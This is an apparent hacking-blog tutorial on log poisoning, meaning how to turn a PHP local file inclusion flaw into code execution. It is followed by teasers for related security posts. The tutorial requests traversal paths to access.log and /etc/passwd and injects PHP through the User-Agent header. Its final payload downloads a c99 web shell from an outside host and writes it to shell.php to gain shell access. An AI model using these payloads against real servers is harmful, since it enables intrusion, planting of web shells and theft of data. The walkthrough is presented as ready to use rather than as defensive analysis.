Log poisoning is a technique that not many know about.
this technique works only if you can make an LFI of the page.
if we say that you call index.php, which is vulnerable to LFI
and writes index.php? inc =../../../ var / www / logs / access.log

So you see that it will produce a logfile.
that looks something like this:
11.11.11.11 – – [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1” 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1” 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11”
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1” 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164” – “” Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”

As you can see logs serve our user-agent
If we change our user-agent to: <? Php echo ‘test’;?>
Can we hope the following restultat:
11.11.11.11 – – [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1” 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1” 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11”
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1” 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164” – “” test ”
As you can see, were running our PHP question.
change it as our user-agent to:
<? php fwrite (fopen ( ‘shell.php’, ‘w’), file_get_contents ( ‘hxxp: / / hack3r.org/path/to/c99.txt’)); die;?>
so it creates a file called shell.php with our shell script in.
And wopidoo, we have shell access.

Explore More

Blind SQL Injection and XSS Vulnerability in MyRingTune

PlanetCreator reported another critical SQL injection (vulnerability) on MyRingTune  URL : http://www.myringtuneonline.com SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of

Read More

Kiddies are trying to Dig to PlanetCreator by sending dummies Trojan?

Today, I got a direct email from [email protected] title with “‘bombing’ Breaking News @ Northern Chan State”. It’s zipped with WinRAR : named NamKham.rar. Inside … namkham bombrcs.doc The SCR

Read More

Chinese schools deny Google cyber-attack links

Two Chinese schools have denied the New York Times inform which they were involved in the much-discussed cyber attacks upon Google as good as during slightest 33 alternative outfits sometime

Read More